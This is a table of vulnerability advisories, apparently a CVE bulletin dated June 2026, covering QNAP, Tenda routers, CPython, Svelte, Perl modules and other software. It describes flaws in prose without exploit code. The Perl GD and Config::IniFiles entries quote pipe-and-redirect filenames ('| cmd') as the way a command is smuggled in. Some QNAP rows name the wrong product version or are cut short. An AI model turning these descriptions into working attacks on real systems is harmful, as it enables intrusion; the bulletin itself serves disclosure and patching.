| pretix--pretix | When creating an export of all reusable media, the secrets of connected gift cards were included in the export even if the user creating the export does not have permission to view gift cards. This is inconsistent with the UI and API where only the first letters of the gift card secret are shown. Therefore, it allows circumventing a permission boundary. | 2026-06-09 | not yet calculated | CVE-2026-11764 |
| Python Software Foundation--CPython | bz2.BZ2Decompressor objects could be reused after a decompression error. If an application caught the resulting OSError and retried with the same decompressor, crafted input could cause the decompressor to resume from an invalid internal state and perform out-of-bounds writes to a stack buffer. This could crash the process when processing untrusted data. | 2026-06-08 | not yet calculated | CVE-2026-9669 |
| QNAP Systems Inc.--File Station 5 | A NULL pointer dereference vulnerability has been reported to affect File Station 6. If a remote attacker gains a user account, they can then exploit the vulnerability to launch a denial-of-service (DoS) attack. We have already fixed the vulnerability in the following version: File Station 5 5.5.6.5208 and later | 2026-06-10 | not yet calculated | CVE-2026-22899 |
| QNAP Systems Inc.--File Station 5 | An allocation of resources without limits or throttling vulnerability has been reported to affect File Station 6. If a remote attacker gains a user account, they can then exploit the vulnerability to prevent other systems, applications, or processes from accessing the same type of resource. We have already fixed the vulnerability in the following version: File Station 5 5.5.6.5243 and later | 2026-06-10 | not yet calculated | CVE-2026-24720 |
| QNAP Systems Inc.--File Station 5 | An incorrect authorization vulnerability has been reported to affect File Station 6. If a remote attacker gains a user account, they can then exploit the vulnerability to bypass intended access restrictions. We have already fixed the vulnerability in the following version: File Station 5 5.5.6.5243 and later | 2026-06-10 | not yet calculated | CVE-2026-24724 |
| QNAP Systems Inc.--File Station 5 | A buffer overflow vulnerability has been reported to affect File Station 5. If a remote attacker gains a user account, they can then exploit the vulnerability to modify memory or crash processes. We have already fixed the vulnerability in the following version: File Station 5 5.5.6.5208 and later | 2026-06-10 | not yet calculated | CVE-2026-26239 |
| QNAP Systems Inc.--File Station 5 | A buffer overflow vulnerability has been reported to affect File Station 5. The remote attackers can then exploit the vulnerability to modify memory or crash processes. We have already fixed the vulnerability in the following version: File Station 5 5.5.6.5243 and later | 2026-06-10 | not yet calculated | CVE-2026-26240 |
| QNAP Systems Inc.--File Station 5 | A buffer overflow vulnerability has been reported to affect File Station 5. The remote attackers can then exploit the vulnerability to modify memory or crash processes. We have already fixed the vulnerability in the following version: File Station 5 5.5.6.5243 and later | 2026-06-10 | not yet calculated | CVE-2026-26241 |
| QNAP Systems Inc.--License Center | A path traversal vulnerability has been reported to affect License Center. If a local attacker gains an administrator account, they can then exploit the vulnerability to read the contents of unexpected files or system data. We have already fixed the vulnerability in the following version: License Center 1.9.56 and later | 2026-06-10 | not yet calculated | CVE-2025-62851 |
| QNAP Systems Inc.--Notification Center | A cross-site request forgery (CSRF) vulnerability has been reported to affect Notification Center. The remote attackers can then exploit the vulnerability to gain privileges or hijack user identities. We have already fixed the vulnerability in the following version: Notification Center 1.10.0.3291 and later | 2026-06-10 | not yet calculated | CVE-2025-58468 |
| QNAP Systems Inc.--QTS | QTS, QuTS hero, QuTScloud are not affected. We have already fixed the vulnerability in the following version: | 2026-06-10 | not yet calculated | CVE-2025-59382 |
| QNAP Systems Inc.--QTS | A buffer overflow vulnerability has been reported to affect several QNAP operating system versions. If a remote attacker gains an administrator account, they can then exploit the vulnerability to modify memory or crash processes. We have already fixed the vulnerability in the following versions: QTS 5.2.9.3410 build 20260214 and later QuTS hero h5.2.9.3410 build 20260214 and later QuTS hero h5.3.4.3500 build 20260520 and later QuTS hero h6.0.0.3397 build 20260206 and later | 2026-06-09 | not yet calculated | CVE-2025-62858 |
| QNAP Systems Inc.--QTS | A command injection vulnerability has been reported to affect several QNAP operating system versions. If a remote attacker gains an administrator account, they can then exploit the vulnerability to execute arbitrary commands. We have already fixed the vulnerability in the following versions: QTS 5.2.9.3410 build 20260214 and later QuTS hero h5.2.9.3410 build 20260214 and later QuTS hero h5.3.4.3500 build 20260520 and later QuTS hero h6.0.0.3397 build 20260206 and later | 2026-06-10 | not yet calculated | CVE-2025-66273 |
| QNAP Systems Inc.--QTS | QuTS hero is not affected. We have already fixed the vulnerability in the following version: QTS 5.2.7.3256 build 20250913 and later | 2026-06-10 | not yet calculated | CVE-2025-66276 |
| QNAP Systems Inc.--QTS | A command injection vulnerability has been reported to affect several QNAP operating system versions. If a remote attacker gains an administrator account, they can then exploit the vulnerability to execute arbitrary commands. We have already fixed the vulnerability in the following versions: QTS 5.2.9.3410 build 20260214 and later QuTS hero h5.2.9.3410 build 20260214 and later QuTS hero h5.3.4.3500 build 20260520 and later QuTS hero h6.0.0.3397 build 20260206 and later | 2026-06-10 | not yet calculated | CVE-2025-66279 |
| QNAP Systems Inc.--QTS | An integer overflow or wraparound vulnerability has been reported to affect several QNAP operating system versions. If a remote attacker gains an administrator account, they can then exploit the vulnerability to compromise the security of the system. We have already fixed the vulnerability in the following versions: QTS 5.2.9.3410 build 20260214 and later QuTS hero h5.2.9.3410 build 20260214 and later QuTS hero h5.3.4.3500 build 20260520 and later QuTS hero h6.0.0.3397 build 20260206 and later | 2026-06-10 | not yet calculated | CVE-2025-66280 |
| QNAP Systems Inc.--QTS | A NULL pointer dereference vulnerability has been reported to affect several QNAP operating system versions. The remote attackers can then exploit the vulnerability to launch a denial-of-service (DoS) attack. We have already fixed the vulnerability in the following versions: QTS 5.2.9.3410 build 20260214 and later QuTS hero h5.2.9.3410 build 20260214 and later QuTS hero h5.3.4.3500 build 20260520 and later QuTS hero h6.0.0.3397 build 20260206 and later | 2026-06-10 | not yet calculated | CVE-2025-66281 |
| QNAP Systems Inc.--QTS | A command injection vulnerability has been reported to affect several QNAP operating system versions. If a remote attacker gains an administrator account, they can then exploit the vulnerability to execute arbitrary commands. We have already fixed the vulnerability in the following versions: QTS 5.2.9.3410 build 20260214 and later QuTS hero h5.2.9.3410 build 20260214 and later QuTS hero h5.3.4.3500 build 20260520 and later QuTS hero h6.0.0.3459 build 20260409 and later | 2026-06-10 | not yet calculated | CVE-2026-22893 |
| QNAP Systems Inc.--QTS | A NULL pointer dereference vulnerability has been reported to affect several QNAP operating system versions. If a remote attacker gains an administrator account, they can then exploit the vulnerability to launch a denial-of-service (DoS) attack. We have already fixed the vulnerability in the following versions: QTS 5.2.9.3492 build 20260507 and later QuTS hero h5.2.9.3499 build 20260514 and later QuTS hero h5.3.4.3500 build 20260520 and later QuTS hero h6.0.0.3459 build 20260409 and later | 2026-06-10 | not yet calculated | CVE-2026-24716 |
| QNAP Systems Inc.--QTS | A path traversal vulnerability has been reported to affect several QNAP operating system versions. If a remote attacker gains an administrator account, they can then exploit the vulnerability to read the contents of unexpected files or system data. We have already fixed the vulnerability in the following versions: QTS 5.2.9.3492 build 20260507 and later QuTS hero h5.2.9.3499 build 20260514 and later QuTS hero h5.3.4.3500 build 20260520 and later QuTS hero h6.0.0.3459 build 20260409 and later | 2026-06-10 | not yet calculated | CVE-2026-24717 |
| QNAP Systems Inc.--QTS | A command injection vulnerability has been reported to affect several QNAP operating system versions. If a remote attacker gains an administrator account, they can then exploit the vulnerability to execute arbitrary commands. We have already fixed the vulnerability in the following versions: QTS 5.2.9.3492 build 20260507 and later QuTS hero h5.2.9.3499 build 20260514 and later | 2026-06-10 | not yet calculated | CVE-2026-24719 |
| QNAP Systems Inc.--QTS | A cross-site scripting (XSS) vulnerability has been reported to affect several QNAP operating system versions. The remote attackers can then exploit the vulnerability to bypass security mechanisms or read application data. We have already fixed the vulnerability in the following versions: QTS 5.2.9.3492 build 20260507 and later QuTS hero h5.2.9.3499 build 20260514 and later QuTS hero h5.3.4.3500 build 20260520 and later QuTS hero h6.0.0.3500 build 20260520 and later | 2026-06-09 | not yet calculated | CVE-2026-41539 |
| QNAP Systems Inc.--QuMagie | A missing authorization vulnerability has been reported to affect QuMagie. The remote attackers can then exploit the vulnerability to access unauthorized data or perform unauthorized actions. We have already fixed the vulnerability in the following version: QuMagie 2.9.0 and later | 2026-06-09 | not yet calculated | CVE-2026-26236 |
| QNAP Systems Inc.--QuMagie | A missing authorization vulnerability has been reported to affect QuMagie. The remote attackers can then exploit the vulnerability to access unauthorized data or perform unauthorized actions. We have already fixed the vulnerability in the following version: QuMagie 2.9.0 and later | 2026-06-10 | not yet calculated | CVE-2026-26237 |
| QNAP Systems Inc.--QuMagie | An authorization bypass through user-controlled key vulnerability has been reported to affect QuMagie. The remote attackers can then exploit the vulnerability to gain unintended privileges. We have already fixed the vulnerability in the following version: QuMagie 2.9.1 and later | 2026-06-09 | not yet calculated | CVE-2026-44083 |
| QNAP Systems Inc.--QuTS hero | A NULL pointer dereference vulnerability has been reported to affect several QNAP operating system versions. If a remote attacker gains an administrator account, they can then exploit the vulnerability to launch a denial-of-service (DoS) attack. We have already fixed the vulnerability in the following versions: QuTS hero h5.2.9.3410 build 20260214 and later QuTS hero h5.3.4.3500 build 20260520 and later QuTS hero h6.0.0.3459 build 20260409 and later | 2026-06-10 | not yet calculated | CVE-2025-62850 |
| raszi--node-tmp | tmp is a temporary file and directory creator for node.js. Prior to 0.2.6, the tmp npm package contains a path traversal vulnerability that allows escaping the intended temporary directory when untrusted data flows into the prefix, postfix, or dir options. By embedding traversal sequences (e.g., ../) or path separators in these parameters, attackers can cause files to be created outside the configured temporary base directory at attacker-controlled locations with the privileges of the running process. This vulnerability affects applications that pass user-controlled data to tmp's file/directory creation functions without proper input sanitization. This vulnerability is fixed in 0.2.6. | 2026-06-11 | not yet calculated | CVE-2026-44705 |
| Redmine--Redmine | The system stores the username and password from the login form after submitting the request. This could allow an attacker with access to the platform to return to the browser and view the login credentials. | 2026-06-12 | not yet calculated | CVE-2026-1836 |
| RURBAN--GD | GD versions before 2.86 for Perl allow OS command injection and file overwrite via a 2-arg open() of filename arguments in _make_filehandle. GD::Image::_make_filehandle opens a filename argument with Perl's 2-arg open(), so a filename that begins or ends with a pipe ("| cmd", "cmd |") or begins with a redirect ("> path", ">> path") is run as a command or redirect rather than opened as a file. _make_filehandle is the single open path behind every filename-accepting constructor (new, newFromPng, newFromJpeg, and the rest); the in-memory *Data variants do not open a path and are unaffected. Any caller that forwards untrusted input to one of these constructors as a pathname can run an arbitrary command or truncate a file under the process UID. | 2026-06-14 | not yet calculated | CVE-2026-11526 |
| Schneider Electric--EcoStruxure IT Data Center Expert | CWE-611 Improper Restriction of XML External Entity Reference vulnerability exists that could cause information disclosure of server-side file contents when an attacker with a Data Center Expert user account submits crafted XML payloads to SOAP service endpoints. | 2026-06-09 | not yet calculated | CVE-2026-8045 |
| SemCms--SemCms | SemCms 5.0 is vulnerable to Cross Site Request Forgery (CSRF) via crafted POST request to /admin/semcms_user.php. | 2026-06-09 | not yet calculated | CVE-2026-39170 |
| SEMCMS-SEMCMS | SEMCMS 5.0 is vulnerable to unauthorized access in SEMCMS_copy.php. | 2026-06-09 | not yet calculated | CVE-2026-39169 |
| Setasign--FPDI | FPDI is a collection of PHP classes that facilitate reading pages from existing PDF documents and using them as templates in FPDF. Prior to version 2.6.7, an attacker can upload a small, malicious PDF file that will cause the server-side script to crash due to memory exhaustion or a script time-out. Repeated attacks can lead to sustained service unavailability. This issue has been patched in version 2.6.7. | 2026-06-11 | not yet calculated | CVE-2026-45802 |
| Shenzhen Kangda Xin Intelligent Network Technology Co., Ltd--DR300 | Shenzhen Kangda Xin Intelligent Network Technology Company's router, model DR300, version 2.1.2.121, contains hardcoded login credentials and has telnet enabled by default on WAN and LAN interfaces. These vulnerabilities allow attackers to read and write to memory, modify firmware stored in flash, inspect active connections, and view currently connected devices. | 2026-06-09 | not yet calculated | CVE-2026-10045 |
| Shenzhen Tenda Technology Co. Ltd--Tenda AC1206 | Shenzhen Tenda Technology Co., Ltd Tenda AC1206 v15.03.06.23 was discovered to contain multiple stack overflows in the fromGstDhcpSetSer function via the username and password parameters. These vulnerabilities allow attackers to cause a Denial of Service (DoS) via a crafted HTTP request. | 2026-06-08 | not yet calculated | CVE-2026-36789 |
| Shenzhen Tenda Technology Co. Ltd--Tenda FH451 | Shenzhen Tenda Technology Co., Ltd Tenda FH451 V1.0.0.9 was discovered to contain a stack overflow in the list1 parameter of the fromDhcpListClient function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted HTTP request. | 2026-06-08 | not yet calculated | CVE-2026-36786 |
| Shenzhen Tenda Technology Co. Ltd--Tenda GO | Shenzhen Tenda Technology Co., Ltd Tenda G0 v15.11.0.5 was discovered to contain a stack overflow in the picCropName parameter of the formCropAndSetWewifiPic function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted HTTP request. | 2026-06-09 | not yet calculated | CVE-2026-36796 |
| Shenzhen Tenda Technology Co. Ltd--Tenda GO | Shenzhen Tenda Technology Co., Ltd Tenda G0 v15.11.0.5 was discovered to contain a stack overflow in the IPMacBindRuleIp parameter of the formIPMacBindModify function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted HTTP request. | 2026-06-09 | not yet calculated | CVE-2026-36797 |
| Shenzhen Tenda Technology Co. Ltd--Tenda GO | Shenzhen Tenda Technology Co., Ltd Tenda G0 v15.11.0.5 was discovered to contain multiple stack overflows in the formSetDebugCfgr function via the enable, level, and module parameters. These vulnerabilities allow attackers to cause a Denial of Service (DoS) via a crafted HTTP request. | 2026-06-09 | not yet calculated | CVE-2026-36798 |
| Shenzhen Tenda Technology Co. Ltd--Tenda GO | Shenzhen Tenda Technology Co., Ltd Tenda G0 v15.11.0.5 was discovered to contain a buffer overflow in the portalAuth parameter of the formPortalAuth function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted HTTP request. | 2026-06-09 | not yet calculated | CVE-2026-36799 |
| Shenzhen Tenda Technology Co. Ltd--Tenda GO | Shenzhen Tenda Technology Co., Ltd Tenda G0 v15.11.0.5 was discovered to contain a buffer overflow in the IPMacBindIndex parameter of the formIPMacBindDel function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted HTTP request. | 2026-06-09 | not yet calculated | CVE-2026-36800 |
| Shenzhen Tenda Technology Co. Ltd--Tenda GO | Shenzhen Tenda Technology Co., Ltd Tenda G0 v15.11.0.5 was discovered to contain a buffer overflow in the IPMacBindRule parameter of the formIPMacBindAdd function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted HTTP request. | 2026-06-09 | not yet calculated | CVE-2026-36801 |
| Shenzhen Tenda Technology Co. Ltd--Tenda GO | Shenzhen Tenda Technology Co., Ltd Tenda G0 v15.11.0.5 was discovered to contain multiple buffer overflows in the Saveqqlist function via the qqStr and markStr parameters. These vulnerabilities allow attackers to cause a Denial of Service (DoS) via a crafted HTTP request. | 2026-06-09 | not yet calculated | CVE-2026-36805 |
| Shenzhen Tenda Technology Co. Ltd--Tenda O3 Wireless Router | Shenzhen Tenda Technology Co., Ltd Tenda O3 Wireless Router v1.0.0.5(4180) was discovered to contain a stack overflow in the username parameter of the R7WebsSecurityHandler function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted HTTP request. | 2026-06-09 | not yet calculated | CVE-2026-36778 |
| Shenzhen Tenda Technology Co. Ltd--Tenda O3 Wireless Router | Shenzhen Tenda Technology Co., Ltd Tenda O3 Wireless Router v1.0.0.5(4180) was discovered to contain multiple stack overflows in the fromVirtualSer function via the puVar2, puVar1, __s2, __s1_00, and puVar3 parameters. These vulnerabilities allow attackers to cause a Denial of Service (DoS) via a crafted HTTP request. | 2026-06-09 | not yet calculated | CVE-2026-36779 |
| Shenzhen Tenda Technology Co. Ltd--Tenda O3 Wireless Router | Shenzhen Tenda Technology Co., Ltd Tenda O3 Wireless Router v1.0.0.5(4180) was discovered to contain a stack overflow in the domain parameter of the fromNetToolGet function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted HTTP request. | 2026-06-09 | not yet calculated | CVE-2026-36783 |
| Shenzhen Tenda Technology Co. Ltd--Tenda O3 Wireless Router | Shenzhen Tenda Technology Co., Ltd Tenda O3 Wireless Router v1.0.0.5(4180) was discovered to contain a stack overflow in the ip parameter of the fromNetToolGet function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a HTTP request. | 2026-06-09 | not yet calculated | CVE-2026-36784 |
| Shenzhen Tenda Technology Co. Ltd--Tenda O3v3 | Shenzhen Tenda Technology Co., Ltd Tenda O3v3 v1.0.0.5 was discovered to contain a stack overflow in the save_list_data parameter of the formSetCfm function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted HTTP request. | 2026-06-09 | not yet calculated | CVE-2026-36791 |
| Shenzhen Tenda Technology Co. Ltd--Tenda PW201A | Shenzhen Tenda Technology Co., Ltd Tenda PW201A v1.0.5 was discovered to contain a buffer overflow in the page parameter of the SafeMacFilter function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted HTTP request. | 2026-06-09 | not yet calculated | CVE-2026-36802 |
| Shenzhen Tenda Technology Co. Ltd--Tenda PW201A | Shenzhen Tenda Technology Co., Ltd Tenda PW201A v1.0.5 was discovered to contain a buffer overflow in the page parameter of the qossetting function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted HTTP request. | 2026-06-09 | not yet calculated | CVE-2026-36803 |
| Shenzhen Tenda Technology Co. Ltd--Tenda US_W3V1.0BR | Shenzhen Tenda Technology Co., Ltd Tenda US_W3V1.0BR v1.0.0.3 was discovered to contain a stack overflow in the Go parameter of the ask_to_reboot function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted input. | 2026-06-09 | not yet calculated | CVE-2026-36770 |
| Shenzhen Tenda Technology Co. Ltd--Tenda W15E | Shenzhen Tenda Technology Co., Ltd Tenda W15E v15.11.0.10 was discovered to contain a buffer overflow in the webAuthUserPwd parameter of the formModifyWebAuthUser function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted HTTP request. | 2026-06-09 | not yet calculated | CVE-2026-36806 |
| Shenzhen Tenda Technology Co. Ltd--Tenda W15E | Shenzhen Tenda Technology Co., Ltd Tenda W15E v15.11.0.10 was discovered to contain a buffer overflow in the webAuthUserPwd parameter of the formAddWebAuthUser function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted HTTP request. | 2026-06-09 | not yet calculated | CVE-2026-36807 |
| Shenzhen Tenda Technology Co. Ltd--Tenda W15E | Shenzhen Tenda Technology Co., Ltd Tenda W15E v15.11.0.10 was discovered to contain a buffer overflow in the webAuthUserInfo parameter of the formAddWebAuthUser function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted HTTP request. | 2026-06-09 | not yet calculated | CVE-2026-36808 |
| Shenzhen Tenda Technology Co. Ltd--Tenda W15E | Shenzhen Tenda Technology Co., Ltd Tenda W15E v15.11.0.10 was discovered to contain a buffer overflow in the webAuthWhiteID parameter of the formModifyWebAuthWhiteUser function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted HTTP request. | 2026-06-09 | not yet calculated | CVE-2026-36809 |
| Shenzhen Tenda Technology Co. Ltd--Tenda W15E | Shenzhen Tenda Technology Co., Ltd Tenda W15E v15.11.0.10 was discovered to contain a buffer overflow in the gotoUrl parameter of the formPortalAuth function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted HTTP request. | 2026-06-09 | not yet calculated | CVE-2026-36810 |
| Shenzhen Tenda Technology Co. Ltd--Tenda W15E | Shenzhen Tenda Technology Co., Ltd Tenda W15E v15.11.0.10 was discovered to contain a buffer overflow in the picName parameter of the formDelwebAuthPic function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted HTTP request. | 2026-06-09 | not yet calculated | CVE-2026-36811 |
| Shenzhen Tenda Technology Co. Ltd--Tenda W15E | Shenzhen Tenda Technology Co., Ltd Tenda W15E v15.11.0.10 was discovered to contain a buffer overflow in the picCropName parameter of the formCropAndSetWewifiPic function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted HTTP request. | 2026-06-09 | not yet calculated | CVE-2026-36813 |
| Shenzhen Tenda Technology Co. Ltd--Tenda W15E | Shenzhen Tenda Technology Co., Ltd Tenda W15E v15.11.0.10 was discovered to contain a buffer overflow in the hostname parameter of the formSetNetCheckTools function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted HTTP request. | 2026-06-09 | not yet calculated | CVE-2026-36815 |
| Shenzhen Tenda Technology Co. Ltd--Tenda W15E | Shenzhen Tenda Technology Co., Ltd Tenda W15E v15.11.0.10 was discovered to contain a buffer overflow in the wewifiWhiteUserInfo parameter of the formAddWewifiWhiteUser function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted HTTP request. | 2026-06-09 | not yet calculated | CVE-2026-36816 |
| Shenzhen Tenda Technology Co. Ltd--Tenda W15E | Shenzhen Tenda Technology Co., Ltd Tenda W15E v15.11.0.10 was discovered to contain a buffer overflow in the webAuthWhiteUserInfo parameter of the formAddWebAuthWhiteUser function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted HTTP request. | 2026-06-09 | not yet calculated | CVE-2026-36817 |
| Shenzhen Tenda Technology Co. Ltd--Tenda W20E | Shenzhen Tenda Technology Co., Ltd Tenda W20E v15.11.0.6 was discovered to contain a buffer overflow in the wewifiWhiteUserInfo parameter of the formAddWewifiWhiteUser function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted HTTP request. | 2026-06-09 | not yet calculated | CVE-2026-36818 |
| Shenzhen Tenda Technology Co. Ltd--Tenda W20E | Shenzhen Tenda Technology Co., Ltd Tenda W20E v15.11.0.6 was discovered to contain a buffer overflow in the bindMACAddr parameter of the fromSetDhcpRules function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted HTTP request. | 2026-06-09 | not yet calculated | CVE-2026-36819 |
| Shenzhen Tenda Technology Co. Ltd--Tenda W20E | Shenzhen Tenda Technology Co., Ltd Tenda W20E v15.11.0.6 was discovered to contain a buffer overflow in the webAuthWhiteUserInfo parameter of the formAddWebAuthWhiteUser function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted HTTP request. | 2026-06-09 | not yet calculated | CVE-2026-36820 |
| Shenzhen Tenda Technology Co. Ltd--Tenda W20E | Shenzhen Tenda Technology Co., Ltd Tenda W20E v15.11.0.6 was discovered to contain a buffer overflow in the picCropName parameter of the formCropAndSetWewifiPic function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted HTTP request. | 2026-06-09 | not yet calculated | CVE-2026-36821 |
| Shenzhen Tenda Technology Co. Ltd--Tenda W20E | Shenzhen Tenda Technology Co., Ltd Tenda W20E v15.11.0.6 was discovered to contain a buffer overflow in the macAddr parameter of the formDelStaState function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted HTTP request. | 2026-06-09 | not yet calculated | CVE-2026-36822 |
| Shenzhen Tenda Technology Co. Ltd--Tenda W20E | Shenzhen Tenda Technology Co., Ltd Tenda W20E v15.11.0.6 was discovered to contain a buffer overflow in the webAuthUserInfo parameter of the formAddWebAuthUser function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted HTTP request. | 2026-06-09 | not yet calculated | CVE-2026-36823 |
| Shenzhen Tenda Technology Co. Ltd--Tenda W3 Wireless Router | Shenzhen Tenda Technology Co., Ltd Tenda W3 Wireless Router v1.0.0.3(2204) was discovered to contain a stack overflow in the wl_radio parameter of the formwrlSSIDset function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted input. | 2026-06-09 | not yet calculated | CVE-2026-36771 |
| Shenzhen Tenda Technology Co. Ltd--Tenda W3 Wireless Router | Shenzhen Tenda Technology Co., Ltd Tenda W3 Wireless Router v1.0.0.3(2204) was discovered to contain a stack overflow in the wl_radio parameter of the formwrlSSIDget function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted input. | 2026-06-09 | not yet calculated | CVE-2026-36772 |
| Shenzhen Tenda Technology Co. Ltd--Tenda W3 Wireless Router | Shenzhen Tenda Technology Co., Ltd Tenda W3 Wireless Router v1.0.0.3(2204) was discovered to contain a stack overflow in the Go parameter of the ask_to_reboot function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted input. | 2026-06-09 | not yet calculated | CVE-2026-36773 |
| Shenzhen Tenda Technology Co. Ltd--Tenda W3 Wireless Router | Shenzhen Tenda Technology Co., Ltd Tenda W3 Wireless Router v1.0.0.3(2204) was discovered to contain a stack overflow in the param_1 parameter of the formSetCfm function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted HTTP request. | 2026-06-09 | not yet calculated | CVE-2026-36777 |
| Shenzhen Tenda Technology Co. Ltd--Tenda W3 Wireless Router | Shenzhen Tenda Technology Co., Ltd Tenda W3 Wireless Router v1.0.0.3(2204) was discovered to contain a stack overflow in the wl_radio parameter of the formWifiRadioSet function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted HTTP request. | 2026-06-09 | not yet calculated | CVE-2026-36792 |
| Shenzhen Tenda Technology Co. Ltd--Tenda W3 Wireless Router | Shenzhen Tenda Technology Co., Ltd Tenda W3 Wireless Router v1.0.0.3(2204) was discovered to contain multiple stack overflows in the formwrlSSIDset function via the mit_ssid and mis_ssid_index parameters. These vulnerabilities allow attackers to cause a Denial of Service (DoS) via a crafted HTTP request. | 2026-06-09 | not yet calculated | CVE-2026-36793 |
| Shenzhen Tenda Technology Co. Ltd--Tenda W3 Wireless Router | Shenzhen Tenda Technology Co., Ltd Tenda W3 Wireless Router v1.0.0.3(2204) was discovered to contain multiple stack overflows in the R7WebsSecurityHandler function via the username and password parameters. These vulnerabilities allow attackers to cause a Denial of Service (DoS) via a crafted HTTP request. | 2026-06-09 | not yet calculated | CVE-2026-36794 |
| SHLOMIF--Config::IniFiles | Config::IniFiles versions before 3.001000 for Perl allow OS command injection and file overwrite via a 2-arg open() of the -file argument in _make_filehandle. Config::IniFiles::_make_filehandle opens a filename argument with Perl's 2-arg open(), so a filename that begins or ends with a pipe ("| cmd", "cmd |") or begins with a redirect ("> path", ">> path") is run as a command or redirect rather than opened as a file. The helper is the open path behind the documented -file argument: new(-file => $thing) reaches it through ReadConfig. An in-memory scalar reference (-file => \$text) does not open a path and is unaffected. Any caller that forwards untrusted input to the -file argument can run an arbitrary command or truncate a file under the process UID. | 2026-06-14 | not yet calculated | CVE-2026-11527 |
| simpleble--simpleble | SimpleBLE is a cross-platform library and bindings for Bluetooth Low Energy (BLE). Prior to version 0.14.0, there are multiple stack-based buffer overflow vulnerabilities in SimpleBLE. There is a stack overflow vulnerability in the dongl backend's Protocol::simpleble_write function (local, caller-controlled input). A stack overflow vulnerability when processing manufacturer-specific data in BLE advertisements (remote, no pairing or connection required). Lastly, a stack overflow vulnerability when processing service data in BLE advertisements (remote, no pairing or connection required). This issue has been patched in version 0.14.0. | 2026-06-09 | not yet calculated | CVE-2026-44634 |
| Slate Digital LLC--Slate Digital Connect | Slate Digital Connect 1.37.0 for macOS installs a privileged helper tool, com.slatedigital.connect.privileged.helper.tool, which exposes the XPC service com.slatedigital.connect.privileged.helper.tool2. The helper validates connecting XPC clients by checking only the subject.OU value of the client's signing certificate and does not verify that the certificate chains to a trusted code-signing authority. A local attacker can sign a malicious client with a self-signed certificate containing the expected organizational unit value and connect to the privileged XPC service. This allows unauthorized access to privileged helper functionality and may lead to local privilege escalation. | 2026-06-10 | not yet calculated | CVE-2026-24066 |
| Slate Digital LLC--Slate Digital Connect | Slate Digital Connect 1.37.0 for macOS installs a privileged helper tool, com.slatedigital.connect.privileged.helper.tool, which exposes the XPC service com.slatedigital.connect.privileged.helper.tool2. The helper validates connecting XPC clients by obtaining the client's process identifier and using it to retrieve code-signing information for the process. This PID-based client validation is subject to a time-of-check time-of-use race condition because process identifiers can be reused. A local attacker can exploit PID reuse so that validation is performed against a trusted process instead of the original connecting process. This allows unauthorized access to privileged helper functionality and may lead to local privilege escalation. | 2026-06-10 | not yet calculated | CVE-2026-24067 |
| Sonatype--Nexus Repository Manager | A remote unauthenticated attacker may be able to conduct credential-guessing attacks against user accounts in Sonatype Nexus Repository via authentication endpoints. | 2026-06-11 | not yet calculated | CVE-2026-3329 |
| sveltejs--svelte | Svelte is a performance oriented web framework. From version 5.51.5 to before version 5.55.7, an internal regex in the Svelte runtime can take exponential time to test in <svelte:element this={tag}></svelte:element>. This issue has been patched in version 5.55.7. | 2026-06-09 | not yet calculated | CVE-2026-42567 |
| sveltejs--svelte | Svelte is a performance oriented web framework. Prior to version 5.55.7, Svelte was vulnerable to DOM clobbering of its internal framework state on elements, potentially leading to XSS attacks. This issue has been patched in version 5.55.7. | 2026-06-09 | not yet calculated | CVE-2026-42573 |
| sveltejs--svelte | Svelte is a performance oriented web framework. Prior to version 5.55.7, when using spread syntax to render attributes from untrusted data, event handler properties are included in the rendered HTML output. If an application spreads user-controlled or external data as element attributes, an attacker can inject malicious event handlers that execute in victims' browsers. Note that this vulnerability only triggers if the user's browser has JavaScript enabled but Svelte's hydration mechanism does not reach the vulnerable element before the event fires. This issue has been patched in version 5.55.7. | 2026-06-09 | not yet calculated | CVE-2026-42599 |
| Thinkst Applied Research--Canarytokens | An HTML injection vulnerability in the "fetch links" email sent by Thinkst Applied Research Canarytokens, enabling Interface Manipulation, Cross-Site Scripting (XSS) in emails clients that render HTML emails. This issue affects Canarytokens: from Docker tag sha-c0f3cf142 before sha-08c3f93d, from Git commit c0f3cf142 before 08c3f93d. | 2026-06-10 | not yet calculated | CVE-2026-11859 |
| thorsten--phpMyFAQ | phpMyFAQ is an open source FAQ web application. Prior to version 4.1.4, attachment passwords are hashed using SHA-1, a cryptographically broken algorithm. SHA-1 has been vulnerable to collision attacks since 2017 (SHAttered). Version 4.1.4 fixes the issue. | 2026-06-08 | not yet calculated | CVE-2026-48488 |
